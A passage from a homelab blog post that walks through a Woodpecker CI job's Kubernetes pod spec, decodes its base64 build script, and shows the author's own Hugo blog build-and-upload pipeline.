</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_STARTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888951&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_STATUS</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">success</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PIPELINE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com/repos/1/pipeline/3</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_AUTHOR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_AUTHOR_AVATAR</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/avatars/d941e68cc8aa38efdee91c3e3c97159e</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_AUTHOR_EMAIL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">mmeier@noreply.gitea.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_BRANCH</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_MESSAGE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">        Possibly fix permission error</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_REF</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">refs/heads/master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_SHA</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">b680ab9b9a7aa300d80a43bd389de0e57f767e4f</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_COMMIT_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/b680ab9b9a7aa300d80a43bd389de0e57f767e4f</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_CREATED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736800786&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_EVENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_FINISHED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736800827&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_FORGE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests/commit/b680ab9b9a7aa300d80a43bd389de0e57f767e4f</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;2&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_PARENT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_STARTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736800790&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_STATUS</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">failure</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_PREV_PIPELINE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com/repos/1/pipeline/2</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">adm/ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_CLONE_SSH_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">ssh://gituser@git.example.com:1234/adm/ci-tests.git</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_CLONE_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests.git</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_DEFAULT_BRANCH</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">master</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_OWNER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">adm</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_PRIVATE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;true&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_REMOTE_ID</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;94&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_SCM</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">git</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_TRUSTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;false&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_REPO_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://gitea.example.com/adm/ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_FINISHED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888960&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;0&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_STARTED</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1736888951&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_STATUS</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">success</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_STEP_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com/repos/1/pipeline/3</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_HOST</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">ci.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">woodpecker</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_PLATFORM</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">linux/amd64</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_URL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">https://ci.example.com</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SYSTEM_VERSION</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">2.8.1</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_WORKFLOW_NAME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">my-first-workflow</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_WORKFLOW_NUMBER</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#e6db74">&#34;1&#34;</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_WORKSPACE</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/woodpecker/src/gitea.example.com/adm/ci-tests</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">HOME</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/root</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SCRIPT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">CmlmIFsgLW4gIiRDSV9ORVRSQ19NQUNISU5FIiBdOyB0aGVuCmNhdCA8PEVPRiA+ICRIT01FLy5uZXRyYwptYWNoaW5lICRDSV9ORVRSQ19NQUNISU5FCmxvZ2luICRDSV9ORVRSQ19VU0VSTkFNRQpwYXNzd29yZCAkQ0lfTkVUUkNfUEFTU1dPUkQKRU9GCmNobW9kIDA2MDAgJEhPTUUvLm5ldHJjCmZpCnVuc2V0IENJX05FVFJDX1VTRVJOQU1FCnVuc2V0IENJX05FVFJDX1BBU1NXT1JECnVuc2V0IENJX1NDUklQVAoKZWNobyArICdlY2hvICJUaGlzIGlzIHRoZSBidWlsZCBzdGVwIicKZWNobyAiVGhpcyBpcyB0aGUgYnVpbGQgc3RlcCIKCmVjaG8gKyAnZWNobyAiYmluYXJ5LWRhdGEtMTIzIiA+IGV4ZWN1dGFibGUnCmVjaG8gImJpbmFyeS1kYXRhLTEyMyIgPiBleGVjdXRhYmxlCgplY2hvICsgJ2NobW9kIHUreCAuL2V4ZWN1dGFibGUnCmNobW9kIHUreCAuL2V4ZWN1dGFibGUKCmVjaG8gKyAnc2xlZXAgMTIwJwpzbGVlcCAxMjAK</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SHELL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/bin/sh</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">debian</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">imagePullPolicy</span>: <span style="color:#ae81ff">Always</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjg6be5cq</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">resources</span>: {}
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">terminationMessagePath</span>: <span style="color:#ae81ff">/dev/termination-log</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">terminationMessagePolicy</span>: <span style="color:#ae81ff">File</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/woodpecker</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjasgpcwn-0-default</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/var/run/secrets/kubernetes.io/serviceaccount</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-api-access-n75dj</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">workingDir</span>: <span style="color:#ae81ff">/woodpecker/src/gitea.example.com/adm/ci-tests</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dnsPolicy</span>: <span style="color:#ae81ff">ClusterFirst</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enableServiceLinks</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imagePullSecrets</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">regcred</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeName</span>: <span style="color:#ae81ff">sehith</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#ae81ff">amd64</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">preemptionPolicy</span>: <span style="color:#ae81ff">PreemptLowerPriority</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">priority</span>: <span style="color:#ae81ff">0</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">restartPolicy</span>: <span style="color:#ae81ff">Never</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedulerName</span>: <span style="color:#ae81ff">default-scheduler</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">securityContext</span>: {}
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceAccount</span>: <span style="color:#ae81ff">default</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceAccountName</span>: <span style="color:#ae81ff">default</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">terminationGracePeriodSeconds</span>: <span style="color:#ae81ff">30</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tolerations</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoExecute</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node.kubernetes.io/not-ready</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tolerationSeconds</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">effect</span>: <span style="color:#ae81ff">NoExecute</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">key</span>: <span style="color:#ae81ff">node.kubernetes.io/unreachable</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">operator</span>: <span style="color:#ae81ff">Exists</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">tolerationSeconds</span>: <span style="color:#ae81ff">300</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjasgpcwn-0-default</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistentVolumeClaim</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">claimName</span>: <span style="color:#ae81ff">wp-01jhkac6pf4jyfywavjasgpcwn-0-default</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-api-access-n75dj</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">projected</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">defaultMode</span>: <span style="color:#ae81ff">420</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">sources</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">serviceAccountToken</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">expirationSeconds</span>: <span style="color:#ae81ff">3607</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">path</span>: <span style="color:#ae81ff">token</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">key</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">path</span>: <span style="color:#ae81ff">ca.crt</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kube-root-ca.crt</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">downwardAPI</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">items</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#f92672">fieldRef</span>:
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">fieldPath</span>: <span style="color:#ae81ff">metadata.namespace</span>
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">path</span>: <span style="color:#ae81ff">namespace</span>
</span></span></code></pre></div><p>There are a number of noteworthy things in here. First perhaps the handling of
the script to execute for the job:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">command</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">/bin/sh</span>
</span></span><span style="display:flex;"><span>    - -<span style="color:#ae81ff">c</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">echo $CI_SCRIPT | base64 -d | /bin/sh -e</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">env</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">CI_SCRIPT</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">CmlmIFsgLW4gIiRDSV9ORVRSQ19NQUNISU5FIiBdOyB0aGVuCmNhdCA8PEVPRiA+ICRIT01FLy5uZXRyYwptYWNoaW5lICRDSV9ORVRSQ19NQUNISU5FCmxvZ2luICRDSV9ORVRSQ19VU0VSTkFNRQpwYXNzd29yZCAkQ0lfTkVUUkNfUEFTU1dPUkQKRU9GCmNobW9kIDA2MDAgJEhPTUUvLm5ldHJjCmZpCnVuc2V0IENJX05FVFJDX1VTRVJOQU1FCnVuc2V0IENJX05FVFJDX1BBU1NXT1JECnVuc2V0IENJX1NDUklQVAoKZWNobyArICdlY2hvICJUaGlzIGlzIHRoZSBidWlsZCBzdGVwIicKZWNobyAiVGhpcyBpcyB0aGUgYnVpbGQgc3RlcCIKCmVjaG8gKyAnZWNobyAiYmluYXJ5LWRhdGEtMTIzIiA+IGV4ZWN1dGFibGUnCmVjaG8gImJpbmFyeS1kYXRhLTEyMyIgPiBleGVjdXRhYmxlCgplY2hvICsgJ2NobW9kIHUreCAuL2V4ZWN1dGFibGUnCmNobW9kIHUreCAuL2V4ZWN1dGFibGUKCmVjaG8gKyAnc2xlZXAgMTIwJwpzbGVlcCAxMjAK</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">SHELL</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">value</span>: <span style="color:#ae81ff">/bin/sh</span>
</span></span></code></pre></div><p>Running the <code>CI_SCRIPT</code> content through <code>base64 -d</code> results in this shell script:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-shell" data-lang="shell"><span style="display:flex;"><span><span style="color:#66d9ef">if</span> <span style="color:#f92672">[</span> -n <span style="color:#e6db74">&#34;</span>$CI_NETRC_MACHINE<span style="color:#e6db74">&#34;</span> <span style="color:#f92672">]</span>; <span style="color:#66d9ef">then</span>
</span></span><span style="display:flex;"><span>cat <span style="color:#e6db74">&lt;&lt;EOF &gt; $HOME/.netrc
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">machine $CI_NETRC_MACHINE
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">login $CI_NETRC_USERNAME
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">password $CI_NETRC_PASSWORD
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">EOF</span>
</span></span><span style="display:flex;"><span>chmod <span style="color:#ae81ff">0600</span> $HOME/.netrc
</span></span><span style="display:flex;"><span><span style="color:#66d9ef">fi</span>
</span></span><span style="display:flex;"><span>unset CI_NETRC_USERNAME
</span></span><span style="display:flex;"><span>unset CI_NETRC_PASSWORD
</span></span><span style="display:flex;"><span>unset CI_SCRIPT
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;echo &#34;This is the build step&#34;&#39;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;This is the build step&#34;</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;echo &#34;binary-data-123&#34; &gt; executable&#39;</span>
</span></span><span style="display:flex;"><span>echo <span style="color:#e6db74">&#34;binary-data-123&#34;</span> &gt; executable
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;chmod u+x ./executable&#39;</span>
</span></span><span style="display:flex;"><span>chmod u+x ./executable
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>echo + <span style="color:#e6db74">&#39;sleep 120&#39;</span>
</span></span><span style="display:flex;"><span>sleep <span style="color:#ae81ff">120</span>
</span></span></code></pre></div><p>This shows that the commands from the <code>commands:</code> list from the <code>step</code> object
in the Woodpecker file is converted into a shell script by copying the commands
into the script and adding an <code>echo</code> for each of them.</p>
<p>Looking at this and thinking about my own work on a large CI I&rsquo;m sometimes
wondering what we&rsquo;d do without the <code>base64</code> command. &#x1f605;</p>
<p>Another aspect of the setup is all of the available environment variables,
supplying a lot of information not just on the commit currently being CI tested,
but also the previous commit. Most of the <code>CI_</code> variables also have equivalents
prefixed with <code>DRONE_</code>, for backwards compatibility. I removed them in the
output above to not make the snippet too long.</p>
<p>Finally there&rsquo;s proof of what I said above about the agent&rsquo;s architecture. This
pipeline was run by the agent on my AMD64 node, resulting in the NodeSelector for
AMD64 nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">nodeName</span>: <span style="color:#ae81ff">sehith</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">nodeSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kubernetes.io/arch</span>: <span style="color:#ae81ff">amd64</span>
</span></span></code></pre></div><p>Also nice to see that the Pod was running on <code>sehith</code>, which isn&rsquo;t the node the
agent ran on, showing that the Pods are just submitted for scheduling to k8s,
being able to run on any (AMD64 in this case) node.</p>
<p>Before ending the post, let&rsquo;s have a look at some example CI configurations.</p>
<h2 id="ci-configurations">CI configurations</h2>
<p>Each repository using Woodpecker needs to be enabled. This is done from
Woodpecker&rsquo;s web UI:
<figure>
    <img loading="lazy" src="enable_repo.png"
         alt="A screenshot of Woodpecker&#39;s repo enabling UI. IT shows a search field at the top and a list of repositories at the bottom. Some of them have a label saying &#39;Already enabled&#39;, while others have an &#39;Enable&#39; button next to them."/> <figcaption>
            <p>Woodpecker&rsquo;s repo addition UI.</p>
        </figcaption>
</figure>

When clicking the <em>Enable</em> button, Woodpecker will contact Gitea and add a
webhook configuration for the repository. With that, Gitea will call the
webhook with information about the event which triggered it and the state of
the repository.</p>
<p>The Woodpecker configuration files for a specific repository are expected in
the <code>.woodpecker/</code> directory at the repository root by default.</p>
<h3 id="blog-repo-example">Blog repo example</h3>
<p>Here&rsquo;s the configuration I&rsquo;m using to build and publish this blog:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">when</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">event</span>: <span style="color:#ae81ff">push</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">steps</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Build</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hugo:0.125.4-r3&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">hugo</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Missing alt text check</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#ae81ff">python:3</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">pip install lxml beautifulsoup4</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">python3 scripts/alt_text.py ./public/posts/</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Hugo Site Upload</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">image</span>: <span style="color:#e6db74">&#34;harbor.mei-home.net/homelab/hugo:latest&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">environment</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_ACCESS_KEY_ID</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">access-key</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">AWS_SECRET_ACCESS_KEY</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">from_secret</span>: <span style="color:#ae81ff">secret-key</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">commands</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">s3cmd -c /s3cmd.conf sync -r --delete-removed --delete-after --no-mime-magic ./public/ s3://blog/</span>
</span></span></code></pre></div><p>To start with, the page needs to be build, using Hugo in an image I build
myself, based on Alpine with a couple of tools installed. Then I&rsquo;m running
a short Python script which uses <a href="https://pypi.org/project/beautifulsoup4/">beautifulsoup4</a>
to scan through the generated HTML and make sure that each image has alt text,
and that there&rsquo;s actually something in that alt text. Finally, I push the
generated site up to an S3 bucket in my Ceph cluster from where it is served.</p>
<p>The <code>when:</code> at the beginning is important, it determines under which
conditions the pipeline is executed. This can be configured for specific
branches or certain events, like a push or an update of a pull request.
The different conditions can also be combined. In addition to configuring
conditions on the entire pipeline, they can also be configured just on
